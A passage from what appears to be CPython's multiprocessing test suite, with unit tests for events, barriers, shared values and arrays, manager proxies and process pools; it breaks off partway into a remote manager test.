# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.time()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.time() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
